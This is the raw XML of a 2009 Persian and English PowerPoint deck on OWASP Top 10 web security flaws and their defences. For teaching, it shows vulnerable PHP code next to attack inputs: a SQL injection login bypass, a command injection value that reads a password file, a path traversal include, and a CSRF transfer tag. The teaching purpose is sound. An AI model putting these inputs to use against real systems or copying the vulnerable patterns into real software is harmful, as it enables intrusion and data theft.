            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Server Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34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XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>$R=mysql_query(''SELECT * FROM users WHERE Username='{$Username}' AND Password='{$Pass}' '');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34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XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>if ($R) echo '' You logged in successfully! '';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Attack: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>username: foo		password: 1' or '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Manipulated SQL:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> SELECT * FROM users WHERE Username='1' AND Password='1' or '1'='1'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254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Command Injection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29600" cy="5046663"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill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Server Code: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Exec (''mail ''.$UserData);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UserData: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'' hi; cat passwd; ''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mtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              <a:ea typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
              <a:cs typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"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لیست کلمات عبور به همراه متن نامه، به نفوذگر ای‌میل می شوند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.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mtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              <a:ea typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
              <a:cs typeface="CourierNewPSMT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254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Malicious File Execute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29600" cy="5046663"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill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Include direname(__FILE__).''/request_handlers/''.$R;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"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به صورت پویا درخواست کاربر را پاسخ می‌گوییم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...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User Request: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../../passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"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باعث می‌شود فایل رمزهای عبور به جای فایل کد نمایش داده شود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254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Insecure Direct Object Reference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29600" cy="5046663"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill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&lt;select name="language"&gt;&lt;option value="ir"&gt;Farsi&lt;/option&gt;&lt;/select&gt;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 ... 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Include ($_GET['language']."lang.php");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...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&lt;select name="language"&gt;&lt;option value="29871268398721"&gt;Farsi&lt;/option&gt;&lt;/select&gt;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Use Salts to prevent Brute-Force!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043363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mtClean="0"/>
              <a:t>OWASP TOP 10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915988" indent="-914400" eaLnBrk="1" hangingPunct="1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Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" indent="-914400" eaLnBrk="1" hangingPunct="1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Injection Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" indent="-914400" eaLnBrk="1" hangingPunct="1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Insecure Remote File Include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" indent="-914400" eaLnBrk="1" hangingPunct="1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Insecure Direct Object Reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" indent="-914400" eaLnBrk="1" hangingPunct="1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Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" indent="-914400" eaLnBrk="1" hangingPunct="1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Information Leakage and Improper Error Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" indent="-914400" eaLnBrk="1" hangingPunct="1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Broken Authentication and Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" indent="-914400" eaLnBrk="1" hangingPunct="1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Insecure Cryptographic Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" indent="-914400" eaLnBrk="1" hangingPunct="1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Insecure Communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="915988" indent="-914400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955675" algn="l"/>
                <a:tab pos="1489075" algn="l"/>
                <a:tab pos="1627188" algn="l"/>
                <a:tab pos="1981200" algn="l"/>
                <a:tab pos="2336800" algn="l"/>
                <a:tab pos="2693988" algn="l"/>
                <a:tab pos="3049588" algn="l"/>
                <a:tab pos="3403600" algn="l"/>
                <a:tab pos="3759200" algn="l"/>
                <a:tab pos="4116388" algn="l"/>
                <a:tab pos="4471988" algn="l"/>
                <a:tab pos="4827588" algn="l"/>
                <a:tab pos="51816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smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Failure to Restrict URL Access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040313" y="225425"/>
            <a:ext cx="40068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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="XB Titre" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Titre" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>۱۰ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="XB Titre" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Titre" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>خطر اصلی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="XB Titre" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Titre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254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Cross Site Request Forgery (CSRF)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29600" cy="5046663"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill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&lt;img src="http://www.example.com/transfer.do?frmAcct=document.form.frmAcct &amp;toAcct=4345754&amp;toSWIFTid=434343&amp;amt=3434.43"&gt;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254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Insecure Cryptographic Storage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9500"/>
            <a:ext cx="8229600" cy="5046663"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill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$pass=md5($_GET['pass']); // unsafe!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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www.passcracking.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              <a:ea typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
              <a:cs typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"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صحیح(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR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۱) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA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از الگوریتم‌های صحیح (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0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۲)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              <a:ea typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
              <a:cs typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              <a:ea typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
              <a:cs typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone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$pass=hash( ''sha-512'' ,$_GET['pass'].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1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strtolower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
                <a:ea typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
                <a:cs typeface="CourierNewPSMT" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_GET['user']));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578225"/>
            <a:ext cx="7772400" cy="11461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b="1" smtClean="0">
                <a:latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سوالات، پیشنهادات؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"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876800"/>
            <a:ext cx="6400800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" rtl="1"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mtClean="0">
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مناب</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0">
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ع : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> www.owasp.org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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.Cross Site Scripting (XSS)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اسکریپت نویسی مابین سایتی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60363" y="2049463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بیش از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR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۲۰٪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 سایتها آسیب پذیرند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مقابله با آن به غایت مشکل است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هرروزه روشهای جدید فراوانی کشف می شوند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جایگزین‌های معمول برای کاربران سختی‌هایی دارند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می‌توانند به صورت کرم منتشر شوند</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 </a:t>
            </a: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>
              <a:solidFill>
                <a:srgbClr val="FFFF66"/>
              </a:solidFill>
              <a:latin typeface="XB Kayh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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Cross Site Scripting (XSS)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کتابخانه‌های بسیار پیچیده،  سنگین و  کند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کتابخانه‌ها نیز </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR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۱۰۰٪</a:t>
            </a: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مصون نیستند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تحریم امکان استفاده از قالب‌بندی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 سیستم‌های جایگزین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(BBCode)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همگامی با دنیای امنیت اطلاعات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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Injection Flaws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تزریقات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60363" y="2049463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حدود </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR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۱۵٪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 سایتها آسیب‌پذیر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آسیب‌پذیری بسیار محلک و اعمال آن ساده است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در دو دسته آگاهانه و کور انجام می‌گیرد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معمول‌ترین دلیل هک شدن و رسوخ به سایت‌ها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علارقم معروفی بسیار، توسعه‌دهندگان بی‌خبرند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مقابله با آن معمولا ناقص انجام می‌گیرد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در صورت شناخت کافی، مقابله بسیار آسان است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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Injection Flaws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 واسط‌های امن برای دستورات پویا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استفاده از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PreparedStatements </a:t>
            </a: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برای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SQL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عدم استفاده از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XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Escaping </a:t>
            </a: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به عنوان تنها راه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بررسی ورودی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بررسی لیست سفیدی ورود‌ی‌ها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685800" y="158750"/>
            <a:ext cx="77724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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Insecure Remote File Include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371600" y="1204913"/>
            <a:ext cx="6400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rtl="1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b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تزریق کد مخرب</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Kayhan" pitchFamily="2" charset="-78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60363" y="1955800"/>
            <a:ext cx="8380412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احتیاج به آگاهی از روش کار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معمولا توسط توسعه‌دهندگان رعایت نمی‌شود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توسط تنظیمات بستری قابل رفع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بسیار بسیار مخرب و خطرناک در صورت وجود و کشف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  <a:p>
            <a:pPr algn="just" rtl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66"/>
                </a:solidFill>
                <a:latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFF66"/>
                </a:solidFill>
                <a:latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>امکان انجام انواع حملات بدون متوجه شدن سیستم</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:solidFill>
                <a:srgbClr val="FFFF66"/>
              </a:solidFill>
              <a:latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Kayhan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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Insecure Remote File Include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r" rtl="1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b="1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روشهای مقابله</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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عدم استفاده از کدفایل متغیر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بررسی کامل و بسیار دقیق متغیر در آدرس کد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تبیین دقیق قوانین استفاده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  <a:p>
            <a:pPr marL="341313" indent="-341313" algn="r" rtl="1" eaLnBrk="1" hangingPunct="1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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تنظیمات سکوی اجرا</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Roya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S Gothic"/>
        <a:cs typeface="MS Gothic"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Tahoma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1287</Words>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>242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امنیت نرم‌افزارهای وب</vt:lpstr>
      <vt:lpstr>امنیت دنیای وب</vt:lpstr>
      <vt:lpstr>OWASP TOP 10</vt:lpstr>
      <vt:lpstr>Slide 4</vt:lpstr>
      <vt:lpstr>1. Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Slide 6</vt:lpstr>
      <vt:lpstr>2. Injection Flaws</vt:lpstr>
      <vt:lpstr>Slide 8</vt:lpstr>
      <vt:lpstr>3. Insecure Remote File Include</vt:lpstr>
      <vt:lpstr>Slide 10</vt:lpstr>
      <vt:lpstr>4. Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>Slide 12</vt:lpstr>
      <vt:lpstr>5.Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Slide 14</vt:lpstr>
      <vt:lpstr>6. Information Leakage and Improper Error Handling</vt:lpstr>
      <vt:lpstr>Slide 16</vt:lpstr>
      <vt:lpstr>7. Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>Slide 18</vt:lpstr>
      <vt:lpstr>8. Insecure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>Slide 20</vt:lpstr>
      <vt:lpstr>9. Insecure Communications</vt:lpstr>
      <vt:lpstr>Slide 22</vt:lpstr>
      <vt:lpstr>10. Failure to Restrict URL Access</vt:lpstr>
      <vt:lpstr>چند راه‌برد عملی</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Malicious File Execute</vt:lpstr>
      <vt:lpstr>Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Insecure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>سوالات، پیشنهادات؟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MRT</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-09-22T08:35:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-10-02T14:48:24Z</dcterms:modified>
</cp:coreProperties>
</file>